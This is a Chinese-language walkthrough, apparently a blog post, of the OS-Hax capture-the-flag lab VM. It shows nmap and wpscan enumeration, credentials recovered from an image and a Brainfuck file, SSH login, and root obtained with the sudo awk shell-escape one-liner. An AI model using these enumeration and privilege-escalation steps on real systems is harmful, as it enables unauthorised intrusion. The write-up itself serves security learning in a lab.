Os Hax walkthrough
主机识别
arp-scan -l
网络拓扑
| 计算机 | IP |
|---|---|
| 本机(Win10) | 192.168.36.234 |
| Kali | 192.168.36.89 |
| OS-Hax | 192.168.36.98 |
扫描端口和版本信息
nmap -A 192.168.36.98
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root💀kali)-[~]
└─# nmap -A 192.168.36.98
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-30 05:11 UTC
Nmap scan report for localhost (192.168.36.98)
Host is up (0.016s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 43:0e:61:74:5a:cc:e1:6b:72:39:b2:93:4e:e3:d0:81 (RSA)
| 256 43:97:64:12:1d:eb:f1:e9:8c:d1:41:6d:ed:a4:5e:9c (ECDSA)
|_ 256 e6:3a:13:8a:77:84:be:08:57:d2:36:8a:18:c9:09:d6 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hacker_James
MAC Address: A8:66:7F:1B:19:D8 (Apple)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
扫描结果显示靶机开启22、80端口,没什么注意的地方。接下来进行目录枚举,发现网站在路径/wordpress/下搭建的是Wordpress CMS,并且在wpscan工具扫描后发现一个用户:web
1
2
3
4
5
6
7
8
9
10
11
12
┌──(root💀kali)-[~]
└─# wpscan --url http://192.168.36.98/wordpress/ -e u
...
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:06 <====================================> (10 / 10) 100.00% Time: 00:00:06
[i] User(s) Identified:
[+] web
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
...
之后经过账户密码爆破无果后,最终在/img目录下发现一个可疑的图片文件:flaghost.png,并且图片显示内容是用户配置靶机hosts文件,没什么关键信息,不过在经过strings工具查看后得到一个字符串:passw@45。得到该字符串首先想到的就是账户密码,但使用web:passw@45账户名和密码不能登录后台或ssh服务,之后发现这是一个目录名🙄。
在http://192.168.36.98/passw@45/目录下得到一个flag2.txt文本文件,将内容经过Brainfack解码后得到账户名和密码:web:Hacker@4514
Getshell
使用web:Hacker@4514账户名和密码登录到靶机ssh服务,并且发现可运行/usr/bin/awk脚本文件。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(root💀kali)-[~]
└─# ssh web@192.168.36.98
web@192.168.36.98's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)
...
$ id
uid=1001(web) gid=1000(uname-a) groups=1000(uname-a)
$ uname -a
Linux jax 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:01:15 UTC 2019 i686 i686 i686 GNU/Linux
$ sudo -l
Matching Defaults entries for web on jax:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User web may run the following commands on jax:
(root) NOPASSWD: /usr/bin/awk
...
可在web的用户目录下得到第三个flag:
1
2
3
4
5
6
7
8
9
$ cat flag3.txt
______ ______ ____ __
/ ____/____ /_ __/____ / __ \ ____ ____ / /_
/ / __ / __ \ / / / __ \ / /_/ // __ \ / __ \ / __/
/ /_/ // /_/ / / / / /_/ / / _, _// /_/ // /_/ // /_
\____/ \____/ /_/ \____/ /_/ |_| \____/ \____/ \__/
MD5-HASH : 40740735d446c27cd551f890030f7c75
提权
我们知道web账户可运行/usr/bin/awk脚本工具,那么可阅读这篇文章进行awk提权,得到最后一个flag。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
web@jax:~$ sudo awk 'BEGIN {system("/bin/sh")}'
# id
uid=0(root) gid=0(root) groups=0(root)
# ls
flag3.txt
# cat flag3.txt
______ ______ ____ __
/ ____/____ /_ __/____ / __ \ ____ ____ / /_
/ / __ / __ \ / / / __ \ / /_/ // __ \ / __ \ / __/
/ /_/ // /_/ / / / / /_/ / / _, _// /_/ // /_/ // /_
\____/ \____/ /_/ \____/ /_/ |_| \____/ \____/ \__/
MD5-HASH : 40740735d446c27cd551f890030f7c75
总结
主要学到的内容就是对具备SUID权限awk工具进行提权,执行命令是:sudo awk 'BEGIN {system("/bin/sh")}'
This post is licensed under
CC BY 4.0
by the author.